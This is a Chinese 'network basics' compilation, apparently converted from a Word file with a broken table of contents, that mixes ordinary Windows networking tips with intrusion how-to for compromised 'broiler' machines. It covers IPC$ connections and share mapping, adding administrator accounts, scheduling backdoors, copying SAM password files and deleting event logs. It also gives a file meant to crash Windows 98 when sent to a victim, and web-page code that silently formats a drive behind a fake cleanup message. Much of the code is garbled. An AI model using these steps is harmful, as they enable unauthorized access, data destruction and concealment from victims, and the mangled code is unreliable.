2023年网络基础知识大全

网络基础知识大全

网络基础知识大全...............................................错误!未定义书签。

此文章由51cto编辑..............................................错误!未定义书签。

网络常用基础知识：.............................................错误!未定义书签。

1）如何查看本机所开端口：...................................错误!未定义书签。

2）如何获得一个IP地址的主机名？..........................错误!未定义书签。

3）如何查看本机的ip地址？................................错误!未定义书签。

4）再使用net命令的时候碰到一些错误代码，如何查看相应的错误信息？错误！未定

义书签。

5）运用telnet连接到对方主机上，想获得一些系统信息，用什么命令？错误!未定义

书签。

6）跟踪路由器的命令是什么？...............................错误!未定义书签。

7）简朴介绍一下cookie!...................................错误!未定义书签。

8）安装2023的时候，速度会特别特别特别慢，怎么加快安装速度呢？错误!未定义书

签。

9）Windows2K密码忘掉了，如何才干进入系统？...............错误!未定义书签。

10）ping不到，tracert不到，但是却能用nbtstat显示对方的一些信息，为什么？错

误!未定义书签。

11）telnet上去后，如何给对方开共享？.....................错误!未定义书签。

12）如何判断对方的具体操作系统版本？......................错误!未定义书签。

13）如何查看98的随机启动的程序？.........................错误!未定义书签。

14）设立了BIOS密码，可是却忘掉了，该怎么办？............错误!未定义书签。

15）如何自制一个让98蓝屏的炸弹？.........................错误!未定义书签。

16）如何再命令行下杀死对方进程？..........................错误!未定义书签。

17）上次说了ping的基本用法，这次谈谈ping的命令参数！.......错误!未定义书签。

18）如何查看本机的DN$服务器？............................错误!未定义书签。

19）肉鸡上的部分文献无法删除，怎么办？....................错误!未定义书签。

20）再说一个可以限制用户登陆时间的命令！..................错误!未定义书签。

22）如何删除windows2K的默认奉献？.........................错误!未定义书签。

23）139端口的又一用法.....................................错误!未定义书签。

24）运用批解决文献来建立一个记录3389登陆者信息的记录器..…错误!未定义书签。

25）网络命令小节............................................错误!未定义书签。

26）这里我必须（或者说不得不重新重申一个命令！但是说之前我要把这个命令的相关

命令稍微介绍一下！）.........................................错误!未定义书签。

27）关于双系统的两个问题：.................................错误!未定义书签。

28）这里说几个主页恶意代码：『并不是让大家把这些代码加入到自己的主页中！只是

希望大家能了解恶意代码，起到更好的防护作用！J............错误!未定义书签。

29）系统自带的系统工具.....................................错误!未定义书签。

30）批解决在入侵中的几则妙用！.............................错误!未定义书签。

31）再说几个非常简朴实用的DOS命令（工具）：...............错误!未定义书签。

32）ping命令的其他技巧：...................................错误!未定义书签。

局域网应用问题专题解答（Rayi々）................................错误!未定义书签。

1、问：我访问局域网中的计算机时，为什么经常被提醒要输入用户名和密码？错误！

未定义书签。

2、问：上网浏览前在局域网中应如何对IE进行设立？.........错误!未定义书签。

3、问：在局域网中应如何设立OutLookExpress收发邮件？....错误!未定义书签。

4、问：在由三台电脑组成的局域网中，我在其中一台电脑上用过Windows优化大师后，

为什么这台电脑就不能登录网络，并且还提醒找不到拨号适配器？错误!未定义书签。

5、问：如何在局域网中设立QQ、ICQ等即时通讯软件？........错误!未定义书签。

6、问：我想用NetMeeting进行局域网中的通话，应当如何设立？错误!未定义书签。

7、问：我知道在局域网内文献是可以共享的，但我想问的是，打印机和扫描仪应当如

何共享？...................................................错误!未定义书签。

8、我用分机线上网，上网速度最大才48000bps,请问是何因素？尚有，将Modem放

在主机箱侧面，开机后（未打开Modem电源），家里的电话就处在忙音状态，如何解决？

...........................................................错误!未定义书签。

9、我新购的网卡在电脑上无法安装，而在其他电脑上却使用正常，这是怎么回事？错

误!未定义书签。

10、我的电脑出现“网上邻居”中找不到其他联网电脑的故障，如何解决？错误!未定

义书签。

11、问：公司局域网，只有一台机器通过猫接入互联网，现想其他机器接入互联网，请

问如何实现？................................................错误!未定义书签。

12、问：局域网通过路由器、使用ADSL方式上网，如何使各工作站快速的获得可以上

网的IP地址而不手工去指定？................................错误!未定义书签。

13、问：公司要组建局域网，需要用到邮件服务器和WWW服务器，请问这两种服务放到

一台电脑里还是分别用两台电脑？都用什么软件？谢谢！........错误!未定义书签。

14、问：家里原先有一台PII的计算机，最近又新增一台P4机器，操作系统都为Windows

98且已安装网卡，现在我想把他们联起来共享资源，该怎么办？..错误!未定义书签。

15、问：办公室机器桌面的“网上邻居”图标没了，能上Internet,但无法浏览其他

机器上的资源了，怎么办？..................................错误!未定义书签。

16、问：办公室机器桌面的网上邻居图标解决了且也能浏览其他机器的共享资源了，但

发现右键中的“共享”命令没了！怎么办？.....................错误!未定义书签。

17、问：右键中的“共享”命令已经显身！但我设了共享不想让别人从网上邻居中看到

这个共享目录，只有自己知道且能实现异地机上有完全操作的权限。错误！未定义书

签。

18、问：一块PCI总线的10/100自适应网卡，无法正常工作。重要表现在网络时断时

续，不管是不是Ping自己的IP地址，还是Ping对方的IP地址，都有这种情况发生。

查看网卡的指示灯也出现同样的现象。........................错误!未定义书签。

19、问：我的电脑与一个对等网连接好了，但不能读别人电脑上的数据，这是怎么回事？

...........................................................错误!未定义书签。

20、问：我的网络从集线器升级为互换机后，感觉速度并没有多大提高，是什么因素？

...........................................................错误!未定义书签。

21、问：VLAN是什么意思，使用它有什么好处？................错误!未定义书签。

22、问：我的自适应网卡只有红灯闪烁，绿灯不亮，这种情况正常吗？错误!未定义书

签。

23、问：如何使用互换机的UpLink端口，如何连接？使用了UpLink口后，是否还可以

使用其相邻最近的端口？.....................................错误!未定义书签。

24、问：我在安装网卡后，在“系统一设备管理器”中网卡出现黄色的“！”号，请问

该如何解决？................................................错误!未定义书签。

25.问：ADSL上网网页打不开的问题？.........................错误!未定义书签。

网络常用基础知识:

D如何查看本机所开端口：

用netstat-a-n命令查看！再stat下面有一些英文，我来简朴说一下这些英文具体都代

表什么

LISTEN：侦听来自远方的TCP端口的连接请求

SYN-SENT：再发送连接请求后等待匹配的连接请求

SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认

ESTABLISHED：代表一个打开的连接

FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认

FIN-WAIT-2：从远程TCP等待连接中断请求

CLOSE-WAIT：等待从本地用户发来的连接中断请求

CLOSING：等待远程TCP对连接中断的确认

LAST-ACK：等待本来的发向远程TCP的连接中断请求的确认

TIME-WAIT：等待足够的时间以保证远程TCP接受到连接中断请求的确认

CLOSED：没有任何连接状态

2）如何获得一个IP地址的主机名？

运用ping-aip命令查看！再第一行的pinging后面的『ip』前面的英文就是对方主机

名！

同样道理，运用pingmachine_name也可以得到对方的ip

获得一个网站的ip地址的方法是：ping

www.***.com

比如想知道sohu的ip,就用ping

顺便说一句：假如返回：Replyfrom*.*.*.*:TTLexpiredintransit的话，呵呵,代

表TTL（生命周期）在传输过程中过期

什么意思呢？我来解释一下！

导致这个问题出现的因素有两个：1）TTL值太小！TTL值小于你和对方主机之间通过的路由

器数目。2）路由器数量太多，通过路由器的数量大于TTL值！

呵呵，其实这两点是一个意思！只但是说法不同而已！

3）如何查看本机的ip地址？

用ipconfig来查看就可以!

也可以再Windows中的开始菜单，运营中输入winipcfg,同样可以看到自己的ip

ipconfig命令后面假如加一个参数/all的话，可以得到更加具体的资料，比如DNS、网关

等……

4）再使用net命令的时候碰到一些错误代码，如何查看相应的错误信息？

用命令nethelpmsgerorr_code来查看就可以了

比如错误代码为：88

则查看命令为：nethelpmsg88下面有这个错误代码的中文显示！

5）运用telnet连接到对方主机上，想获得一些系统信息，用什么命令？

set命令可以很好的完毕你所需要收集信息的任务的！

方法：再cmd下直接输入set（telnet对方主机以后，也是直接set就可以了〜然后可以得

到NNNNN多的信息）

再这里，computername：呵呵，还用说么？主机名！

OS=Windows_NT：操作系统的类型哦〜

path=C:\perl\bin\：（perl的解释器位置！）

systemDrive=c:操作系统盘符！

USERNAME=coldcrysky当前登陆使用机器的用户

6）跟踪路由器的命令是什么？

tracert格式：tracertip

中间会列出所有通过的路由器列表！这些路由器假如是暴露再防火墙外面的话，还可以看到

路由的IP哦〜呵呵（这里又涉及到了此外一个问题：为什么要把路由放在防火墙后面？因

素呢，重要有两点：1）保护路由器！由于现在越来越多的袭击和入侵己经开始瞄准路由器

了〜假如直接把路由暴露在外面，呵呵，是非常危险的！被DoS了就不好了啊〜呵呵，所以

要放在防火墙里面；2）为路由器减少承担！假如所有的过滤功能统统都压在路由器上面，

呵呵，路由器的承担就太大了！）

当然，运用pathping也可以达成同样效果！格式与tracert同样！

7）简朴介绍一下cookie!

cookie,又名小甜点。

它的作用：记录访问者的一些信息。例如运用cookie记录你所登陆这个网页的次数、登陆

时曾经输入的信息……

最常见的是，大家再登陆论坛（邮箱）的时候，经常在输入第一个字母的时候，往往下面就

显示出了所有在本机登陆过该论坛（邮箱）的用户名吧？呵呵，这个就是cookie的作用！

大家在Administrator的cookies目录中可以看到很多的记事本文档吧？这些都是cookie,

虽然通过了加密，但是仔细查找的话，仍然可以看到一些敏感信息！况且现在也己有了专门

查看cookie的软件！运用这些软件，你的隐私将不保哦〜

那么，如何清除cookie呢？一般情况下，可以在Internet选项中的常规选项卡中看到一个

删除cookies的按钮，点击就可以清楚掉了〜

除此以外，还要在internet选项中的内容选项卡中找到自动完毕按钮，把里面的四项都选

中！然后点击清除表单，清除密码〜

然后到操作系统目录所在的分区中！进入Winnt（98为windows）目录（当然了，这些都是

默认的目录!假如你安装的时候改名了，就相应的去相应目录）之后找到TemporaryInternet

Files目录（2023的目录在c:\Documentsandsettings\administrator\Local

settings\TemporaryInternetFiles）98直接到windows目录下找TemporaryInternet

Files就可以了〜，找到这个文献夹后，打开！看到里面有NNNNNNNNNNNN多的文献了么？

呵呵，这些是你浏览过的网页的记录（有的时候从网站上面看到美丽的FLASH,可是不能保

存怎么办？只要在线浏览一遍以后，断线到这里来找*.swf,之后依次打开查看的话，相信

你会找到你所需要的FLASH的！），好了，跑题了〜继续说：这些文献是网站的页面记录，直

接删除就可以了!

此外，有没有彻底严禁cookie的方法呢？

呵呵，当然有了！在IE的Internet选项中，找到隐私选项卡！，把里面的滑块拖到最上面,

边上写着：阻止所有cookie,呵呵，是不是？

此外一种方法：找到Windows目录下的cookies目录！把里面的txt文献所有删除！，最后

应当只剩下•一个index,dat文献！之后把这个文献夹设立成只读就可以了〜

但是，严禁cookie后，大部分的论坛都无法正常登陆了啊！呵呵，到底严禁不严禁就看你

自己的了〜

8）安装2023的时候，速度会特别特别特别慢，怎么加快安装速度呢？

在DOS上面安装，应当用98启动光盘来引导系统！然后按照下面的方法来做，可以提高安

装速度：

g:\>cdwindows-------假设G为光驱windows为98的安装目录！

g:\windows>smartdrv-------加载smartdrv程序！加载后没有任何提醒信息！只要不返回

错误信息就是加载成功了〜这时候安装2K的话，速度会不久的哦〜

9）Windows2K密码忘掉了，如何才干进入系统？

Windows2K的用户配置信息和密码保存在SAM文献里！该文献位于：

c:\winnt\system32\config目录中！只要删除这个文献就可以了〜

此外，在c:\winnt\repair目录中也同样有一个SAM文献（这个是前者的备份！）假如你在

登陆肉鸡的时候，copy前面那个目录中的SAM文献，你会发现COPY不下来！呵呵，为什么?

由于运营着的2K系统会保护SAM文献啊〜这个时候你就COPY这个就可以了！

10）ping不到，tracert不到，但是却能用nbtstat显示对方的一些信息，为什么？

由于tracert和ping命令使用的是1CMP协议！而nbtstat是通过对方的netbios端口来获

得对方的主机信息的！使用的是UDP和TCP协议！假如对方仅仅只对ICMP协议做了严禁的

话，那通过这个命令获得系统信息是正常的!

11）telnet上去后，如何给对方开共享？

开共享的命令如下：netsharec=c:\winnt\system返回共享成功

之后直接运用\\ip\c来访问对方的system目录了〜删除共享用

sharec/del命令就可以了

12）如何判断对方的具体操作系统版本？

一方面用ver命令查看对方的版本号！

假如是5.00.2195的话，为2K；5.1.2600为XP

从这里可以区分出来到底是2K还是XP了〜下面进行更加具体的区分！

2K的pro和svr版本区分：

在telnet下,netshart查看启动的服务〜假如对方启动了TerminalServices服务的话，

基本上可以判断为svr以上的版本了〜假如没有启动，则为pro!（具体方法有三种，由于

前几天在论坛中我回复过暗界了〜所以这里就不再反复了〜）

XP的pro和home版的区分:

homeedition是无法安装iis的！所以，可以通过iis服务来判断到底是home版或者是pro

了〜

当然了，假如对方是pro,但是将iis删除（停用）的话，就没办法判断了〜呵呵

13）如何查看98的随机启动的程序？

在98下有一个实用配置程序（msconfig）,中文名为：系统配置实用程序，调用的方法是在：

开始一运营中输入msconfig,在里面，有一个启动的选项卡，点击后，可以看到很多随即

启动程序，假如前面带有钩的话，就是启动时随机启动的，取消的话就是把前面的小钩去掉

就可以了〜（假如在这里查看到了一些未知的启动文献一比如没有文献的具体途径，或者没

有文献名的话，最佳取消它的自启动！由于很有也许是木马！）

除了这里以外，尚有config,sys、autoexec.bat>system,ini,win.ini几个选项卡,他们

分别相应这几个文献！只但是在这里更方便查看而已!

14)设立了BIOS密码，可是却忘掉了，该怎么办？

假如是可以进入Windows的话，可以找找biospwds和cmospwd这两个软件看看〜

尚有运用DEBUG法：

简朴介绍两种：

1)-07016

-o7113

-q

2)-o7016

-o7116

-q

另一种方法：copy法：

copyconemos,com

输入下面10个字符:alt+176,alt+17,alt+230,p,alt+176,alt+20,alt+230,q,alt+205,

空格，然后按下F6并回车，退出，运营这个程序就可以了〜

恩，假如不能进入Windows怎么办呢？

简朴介绍两种方法：

1)用通用密码：

AwardBios密码：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD?SW,AWARD_SW,j262,HLT

SER,SKY_FOX,BIOSTAR,ALFAROJIE,Ikwpeter,589721,awkard,h996,CONCAT,589589

AMIbios密码:AMI,BIOS,PASSWORD,HEWITTRAND,AMI_SW,LKWPETER,A.M.I.

这是常见的密码，不妨试试〜

假如不行的话，可以运用CMOS放电：

就是把主板上的电池取下来，等一会儿再插上去〜

15）如何自制一个让98蓝屏的炸弹？

恩，这个是前几天QQ上面朋友问我的问题，整理的时候忽然间想起来了，就写一下好了〜

一方面，打开Word,再插入菜单中选择对象，这时，弹出对象包装程序窗口，再这个窗口

中，点击导入，随便找一个文本或者程序就可以！之后点：编辑菜单。这里选择命令行，出

现一个命令行窗口，在里面协商c:\con\con,点击保存，完毕后，再点编辑包中的复制包,

把他随便到一个地方复制下来，之后看到的是一个名位片断的东西!给这个文献起一个名字，

呵呵，传给那个可怜的家伙吧，等待他蓝屏，掉线！

（这个命令行中可以插入很多的命令，不见得非要用这个98蓝屏漏洞哦〜）顺便说一下：

这个已经不是什么新鲜的技术了，这个技术的名字叫做：碎片对象。呵呵，碎片？记忆碎片

么？不是的！他的后缀是：.shs!之所以说一下这个，是由于有的朋友还不知道〜做一个整

理而已！不知道的朋友看过后就知道了，知道的朋友就权当复习了〜此外，不要运用这个方

法做破坏！否则后果自负！

16）如何再命令行下杀死对方进程？

运用微软的2K以上操作系统都是具有这个工具的！该工具包含在2K光盘的\support\tools

文献夹下！里面有安装程序，点击后，就安装了2K的supporttools工具包，里面有kill

这个工具，这时候再cmd下可以输入kill/?,就可以看到帮助了，使用这个命令的格式是：

killpid（pid是进程的ID号！）再任务管理器中可以看到进程的ID号！（不知道有几位

朋友用过蓝色火焰？呵呵，用法跟这个一摸同样！尚有很多类似的木马、后门软件都有类似

的功能！这个是windows自带的大木马「后门工具」而己！）

这时候，有朋友问了，那再命令行下如何查看进程呢？呵呵，这就用到了系统自带的有一个

后门工具了：再刚才说得那个目录中，尚有一个工具叫tlist看名字就能看出来是干什么

的吧？用法更简朴！直接输入tlist就可以得到pid遇队形程序的列表了〜

那对方机器假如没有安装这两个程序怎么办呢？没关系，你把你操作系统盘符下面

programfiles\supporttools目录下面的这两个相应的exe文献上传到对方的

winnt\system32目录中就可以了！呵呵〜

17）上次说了ping的基本用法，这次谈谈ping的命令参数！

这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指

掌么？恐怕都未必！还是好好看看吧！

这是TCP/IP协议中最有用的命令之一

它给另一个系统发送一系列的数据包，该系统自身又发回一个响应，这条实用程序对查找远

程主机很有用，它返回的结果表达是否能到达主机，宿主机发送一个返回数据包需要多长时

间。

Usage：pingE-t][-a]E-ncount][-1size][-f]L-iTTL][-vTOS]

[~rcount]L-scount][[-jhost-list]L-khost-list]]

[-wtimeout]destination-list

Options：

-tPingthespecifedhostuntilinterrupted.（除非人为中止，否则一直ping下去）

-aResolveaddressestohostnames.（把IP转为主机名）

-ncountNumberofechorequeststosend.（响应请求的数量）

-1sizeSendbuffersize.（封包的大小）

-fSetDon'tFragmentflaginpacket.（信息包中无碎片）

-iTTLTimeToLive.（时间）

-vTOSTypeOfService.（服务类型）

-rcountRecordrouteforcounthops.

-scountTimestampforcounthops.

-jhost-listLoosesourceroutealonghost-list.

-khost-listStrictsourceroutealonghost-list.（较严格的.唉，怎么译好....

算了，放着吧）

-wtimeoutTimeoutinmillisecondstowaitforeachreply,（timeout的时间）

比如大家也许都知道的一个命令#ping-f-s65000***・***.***.***或者前阶段大家所

谓ping死霉国佬时所用的命令（当然这样只会导致我方自己的网络阻塞）。

其实这个命令重要是用来看对方应答的速度，假如怎么ping得到的结果都是requesttime

out。那恐怕你主线就不用你去找这台主机了，它不在你的射程之内。

18）如何查看本机的DNS服务器？

ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以运用一个命令:

再cmd下输入netsh,进入到netsh＞提醒符，再输入：intip进入到interfaceip＞然后

再次输入dump,这时候屏幕上出现当前连接的配置情况了

这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，

所以这里只对部分命令进行讲解：

1）查看本机IP：一方面键入netsh,再netsh＞提醒符下输入：interface回车之后：ip回

车再之后：showaddress回车这样，就可以看到当前连接的IP地址和子网掩码。（其实

这个命令不如ipconfig简朴，也不如ipconfig/all全面）

2）修改网络配置：接着上面的命令，我们使用：setaddressname=''本地连接”

source=staticaddr=00mask=,这样就修改了当前的IP地址，

用showaddress来看看（或者用ipconfig）

3）显示一个完整的网络配置教本：

刚才说过，第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示

网络配置上，还是有自己的特色的！例如：再interfaceip＞状态下输入：dump,会显示一

个清单，显示所有本地连接（不管你是否使用〜）与netstat-an不完全同样！

这就是netsh的简朴介绍和最基础的用法！希望大家可以掌握！还可以输入？来查看帮助!

（要在netsh＞提醒符下才干查看帮助啊〜）

19）肉鸡上的部分文献无法删除，怎么办？

假如对方的文献夹是只读的话，会出现拒绝访问的字样！这时候，我们可以再del命令后面

加上/f参数来删除!

20）再说一个可以限制用户登陆时间的命令！

再net命令中就可以实现这样的功能！具体方法如下：

假如我们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,

用这个命令：

netusercoldcrysky/timesunday-monday,08:00-16:00

之后运用netusercoldcrysky命令来查看登陆时间的限制，可以看到是我们所规定的时间

（由于是中文的，很容易懂，我就不多废话了）

在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！

光说了怎么设立，假如想恢复回去怎么办呢？（就是恢复成默认状态，任何时间都可以登陆

的状态）

看我的：netusercoldcrysky/time:all--这样就可以了~

22）如何删除windows2K的默认奉献？

一方面打开记事本，输入如下内容：

netsharec$/delete

netshared$/delete

netsharee$/delete

netsharef$/delete

netshareg$/delete

netshareipc$/delete

netshareadmin$/delete

这里的c$、d$、e$……是代表默认共享的盘符〜又几个就设立几个就可以了〜

之后点击保存成批解决文献（后缀为：bat的文献！）！加入到启动组中就可以了〜

23）139端口的又一用法

呵呵，写这个帖子的因素是由于我答应给一个朋友回复139端口的作用来着……先声明两

点：1）不要运用本帖所提到的方法去搞恶意破坏！2）呵呵，也许许多人已经知道了139

端口这个用法了〜本文只想起到一个抛砖引玉的作用！

废话不多说了〜开始：

假如你使用NT主机的话，那你可要注意了！

重启NT主机的方法如下：

1：Netuse\\XXX.XXX.XXX.XXX\ipc$"password"/user「'username”

建立一个IPC连接

2：netuseH:\\XXX.XXX.XXX.XXX\C$

将对方的C盘映射为自己的h盘

3：copyconh:\reboot.bat

lisreset/reboot

CTRL+Z

在对方的C盘上生成一个能重启机器的文献

4：nettime\\XXX.XXX.XXX.XXX

得到对方机器时间

5：at\\XXX.XXX.XXX.XXX重启的时间c:\reboot.bat

设定对方重启的时间！

6：at\\XXX.XXX.XXX.XXX

查看任务上面是否添加了这个任务

7：等对方重启好了〜

上面的第三步是。nlyfor"in2K的，假如是Nt,就需要用意个指定的重启程序，我们可以

自己编写一个reboot,exe来代替reboot,bat,代码如下：

#include"stdio.h"

^include“windows,h”

intmainO

文献:〃定义重启的时候发送给所有用户的消息

LPSTRmsg=/，RebootToolByLionHook'n”;;

文献:〃尝试用最简朴的API函数重启

if(ExitWindowXXX(EWX_REB00T.0))returnTRUE;

if(ExitWindowXXX(EWX_REB00T|EWX_F0RCE,0))returnTRUE：

文献:〃由于上面的重启不成功，所以需要调整本进程的特权

HANDLEhToken;

TOKEN_PRIVILEGEStkp;

if(!OpenProcessToken(GetCurrentProcess0,TOKENADJUSTPRIVILEGES

|TOKEN_QUERY,&hToken))returnFALSE;

文献:〃获取重启的特权SE_SHUTDOWNNAME

LookupPrivilegevalues(NULL,SE_SIIUTDOWN_NAME,&tkp.Privileges[0],Luid);

tkp.PrivilegeCount=l;

tkp.Privileges[0],Attributes=SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKENPRIVILEGES)NULL,0);

文献:〃判断是NT内核还是9X内核，选择用不同的方式

if(!GetVersion()&0x80000000))

InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);

elseif(!ExitWindowXXX(EWX_REBOOT,0))

if(!ExitWindowXXX(EWX_REB00TEWX_F0RCE,0))

returnFALSE;

returnTRUE;

对了，再次说明啊，别用本文提到的方法搞破坏，小心警察叔叔打PP〜呵呵

24）运用批解决文献来建立一个记录3389登陆者信息的记录器

由于TerminalService默认是没有日记记录的，只能依靠他的系统日记，但是系统日记只

能记录一些大动作（启动或停止服务），那么，如何用批解决文献来编写一个将是3389端口

的程序呢？很简朴：

建立一个批解决文献：内容如下：

©echooff

date/1>>c:\33891og.txt

:TS3389

time/t»c:\33891og.txt

netstat-an|find"3389”卜find"ESTABLISHED"»c:\33891og.txt

goto:TS3389

之后保存！

假如有人用你的3389登陆你的机器，呵呵，在c盘下就有33891og.txt这个文献！记录了

当天日记，尚有连接时间……资料〜开始反击〜呵呵

25）网络命令小节

A、NET命令：

IPC连接：格式netuse\\对方IP\ipc$"密码"user:"用户名”『建立IPC连接〜J

netuse\\对方IP\ipc$/delete『断开连接〜』

以下操作需要在连接到对方主机后才可进行！！！

netusercoldcryskyxyz/add『在连接的目的主机中加入一个用户名为COLDCRYSKY密

码为WYZ的用户』

netlocalgroupAdministratorcoldcrysky/add『把名为coldcrysky的用户加入ADMIN

组-认为着权限的提高啊！！！

netusez:\\对方IP\C$F把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符！』

netstarttelnetf启动TELNET」

netuserguest/active:yes『激活GUEST』

netuserguestcoldcrysky『把GUEST密码改为COLDCRYSKY』

B、AT命令:

查看远程机时间：nettime\\对方IP

加入一项新任务：

at\\对方IP时间文献名『用来把自己上传的后门程序在制定期间运营，方便以后进入

肉鸡！』

C、TELNET命令:

telnet对方IP端口『作用不用我说了吧？？？』

D、FTP命令:

登陆：ftp对方网址（IP地址）

上传文献：get文献在本机完整途径对方文献存放完整途径

下载文献：put对方文献完整途径本机存放文献途径

E、COPY命令：

在建立连接后（特别是IPC$连接后，很有用的命令哦〜）

⑴copyindex,htm\\127.0.0.l\c$\index.htm

r将本机index.htm文献复制到的C盘下,假如要放到对方的NT目录下，则把

C改为admin$J

⑵copy\\127.0.0.l\admin\repair\sam_c:『将远程机数据库文献拷贝到本机C盘根目录

下』F、SET命令:

重要用于分析目的计算机的基本信息用！具体使用方法请查找相关文献！

G、NBTSTAT命令：

nbtstat-A对方IP（这个A大写）

『在其中显示前面的英文或数字就是计算机名称！当然，也可以运用PING-A对方ip的方

法来查看对方主机名！效果相同！！！』

H、SHUTDOWN命令：

『用来关闭对方NT服务的命令J格式如下:

shutdown\\IP地址t:20

F20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』

I、DIR命令：

还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧-----）

J、ECHO命令：

echocoldcrysky>index.htm『用coldcrysky覆盖掉原INDEX.HTM中所有内容」

echocoldcrysky»index.htm『把coldcrysky加入到index,htm中」

K、ATTRIB命令:

更改文献属性用，格式：

Attrib-rindex.htm『去掉只读属性』（H"-分别代表增长和减少）

L、DEL命令：

r删除日记的时候用！』

delc:\winnt\system32\logfiles\*.*

delc:\winnt\system32\config\*.evt

delc:\winnt\system32\dtclog\*.*

delc:\winnt\system32\*.log

delc:\winnt\system32\*.txt

delc:\winnt\*.txt

delc:\winnt\*.log

M、PING命令：

-t：ping制定IP,知道网络断开或按CTRL+C结束!

-a：解释PINGIP的主机名

-ncount：发送count指定的ECHO数据包，默认为4个！

26）这里我必须（或者说不得不重新重申一个命令！但是说之前我要把这个命令的相关命

令稍微介绍一下！）

我要说的命令就是：启动服务和停止服务的netstartandnetstop

这两个命令大多数朋友已经很熟悉了吧？但是为了方便更多的菜鸟能看明白我要说的意思，

不用再看其他相关文章，所以我简朴说两句：netstart是启动服务！那么，如何启动呢？

比如，我们这里要启动telnet服务，那就直接再2K的cmd下输入:netstarttelnet就

OK了〜关闭一项服务的话，把start换成stop就0K了〜但是这里必须要注意：你所关闭

的服务必须是已经启动的服务！！！仿佛是一句废话

0K,有了这个前提后，下面就继续介绍：那么，netstart和netstop到底能启动什么服

务？其实这点也不需要你强记，记住这个命令就可以了：nethelpstartnethelpstop,

这两个会显示出你所能启动的服务有那些~~

这里比如我们查到了这个服务“CLIENTSERVICEFORNETWARE",那么当这个命令使用net

start和netstop的时候，你必须在这项服务上面加上“”，因素是由于这个服务名称中

带有空格！假如服务名称中不带空格，你可以不用带这个引号！！！这点是我强调的问题！大

家一定不要忘掉了！『前些天看到S8S8.net的黑白新区中有人说netstart和netstop

后面的服务名必须带空格是错误的！明白因素了吧？』

27)关于双系统的两个问题：

A、如何在双系统(98、2023)中安全删除2K?

先制作一张Windows98的启动软盘，再用它启动你的计算机，运营sys命令恢复Windows98

引导记录后，再运营fdisk/mbr恢复主引导记录，完毕后进入Windows98,把winnt和system

volumninformation目录删除，再删掉C盘上的boot,inibootfont.bin>ntldr>

>bootsect,dos文献就行了。

B、Windows98/XP双系统启动菜单修复

1.修复前，在BIOS中设立从光驱启动。用眄ndowsXP安装盘启动电脑，在加载必要的驱动

后，出现WindowsXP的安装界面。有三个选项：

(1)要现在开始安装WindowsXP,请按“Enter”键。

(2)要用“恢复控制台"修复WindowsXP安装,按“R”键。

(3)要退出安装程序,不安装WindowsXP,按“F3”键；

2.按“R”键，进入“MicrosoftWindowsXP(TM)故障恢复控制台”界面；故障恢复控制

台提供系统修复和故障恢复功能。系统这时会搜寻已安装的WindowsXP系统文献，然后显

示搜寻结果，并询问“要登录到哪个WindowsXP安装(要取消，请按Enter)”，选择1.

D:\Windows,回车，系统会再询问“管理员密码”，再键入安装WindowsXP时设立的管理

员密码，回车，出现D:\Windows〉，这时需要输入修复命令Fixboot,后面的参数为启动扇

区要写入的磁盘盘符，这里填入C:,回车。修复完毕，键入Exit退出。重启后就会看到久

违的双重启动菜单了。并且，这样修复后基本不产生垃圾文献。

由于这两个问题是非常非常普遍的，所以我就收集到这里了〜

28)这里说几个主页恶意代码：f并不是让大家把这些代码加入到自己的主页中！只是希望

大家能了解恶意代码，起到更好的防护作用！」

A、死循环代码：

『把下列代码加入到网页中，可达成如上效果』

说明：当具有这段代码的网页被人点击，连接就会不断的打开IE浏览器，直到你的系统资

源浪费到0%〜只有重新启动才干正常使用！

防止方法：禁用所有的ActiveX控件和插件！由于这是一个ActiveX教本程序~

B、恐怖的大图片：

r把下列代码加入到网页中，可达成如上效果』

http:〃恐怖图片的连接地址"width="1"height="">

说明：当打开这样的网页，IE会不断的解释试图打开，但由于图片实在太大，超过了其解

决能力，所以……

C、地震死机代码：

「把下列代码加入到网页中，可达成如上效果』

if(window,top.moveBy){

for(i=l;i0;j—){

window,top.moveBy(0,i);

window,top.moveBy(i,0);

window,top.moveBy(0,~i*2);

window,top.moveBy(-i*2,0);

window,top.moveBy(0,i);

window,top.moveBy(i,0);

)

)

)

说明：是windows9x的设备名称解析漏洞！

WIND0WS9x的\con\con设备名称解析漏洞允许用户进行袭击，倒是98死机。原理：我们知

道，CON是DOS下的特殊设备名，不允许做文献名，假如我们在DOS下键入如下命令：copy

coldcrysky.txtcon,系统会显示coldcrysky.txt的内容，假如换成：copy

coldcrysky.txt>con系统会提醒文献不能拷贝到文献自身。假如吧con换成LPT或PRN,则

输出colduysky.txt到打印机。由此可见,CON代表文献自身，假如使用\C0N\C0N命令,

则意味着系统不断调用文献自身,视系统资源迅速枯竭，连按CTRL+ALT+DEL的机会都没有〜

解决办法：

对于9X系统，强烈建议打补丁！！！2023和XP则不会死机〜

D、格式化硬盘：(最恐怖的-----慎用！！！请勿用于非法用途！”使用后假如有任何负作用，

后果自负！与伤寒天空FColdCrySkyJ；乱刀留影无关！！！)

scr,Reset();

scr.Path="C:\\WINDOWS\\StartMenu\\Progranis\\启动\\startup.htm〃；

scr.Doc二〃〃

WSH.rUN('start/mformat,comd:/q/autotest/u);

alert('IMPORTANT:Windowsisremovingunusedtemporaryfiles.');

scr.write();

说明：当您浏览了网页，会把startup,hta文献写入启动文献夹，并提醒WIND。临正在删除

临时文献！事实上是在格式化你的D盘，代码中的：F935DC22-1CF0-11D0-ADB9-00C04FD58A0B

相应为：WindowsScriptingHostShellObject。代码中的：WSH全称是:WindowsScripting

Host,是微软的一种基于32位系统平台与语言无关的教本解释机制，它使得脚本能在

WINDOWS桌面或命令提醒符下运营〜WSH所相应的程序WScript.exe是一个脚本语言解释器，

